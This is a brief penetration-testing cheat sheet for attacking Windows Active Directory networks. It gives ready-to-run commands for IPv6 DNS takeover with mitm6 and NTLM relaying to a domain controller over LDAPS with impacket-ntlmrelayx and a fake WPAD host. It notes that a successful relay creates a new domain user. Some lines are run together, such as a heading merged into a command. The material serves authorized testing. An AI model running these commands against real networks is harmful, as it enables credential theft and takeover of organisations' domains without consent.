mitm6
sudo mitm6 -d DOMAINIPv6 DNS takeover
Information:
sc query winhttpautoproxysvc
SERVICE_NAME: winhttpautoproxysvc
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0# to perform MiTM
sudo mitm6 -d DOMAIN
$ sudo impacket-ntlmrelayx -6 -t [ldaps://DC_IP] -wh [fake-wpad.DOMAIN] -l [LOOT_DIR]
# successful will create a user on domain
# generates a .restore file to restore ACL.Restore using aclpwn
DNS takeover using delegate access
Additional Reading
Last updated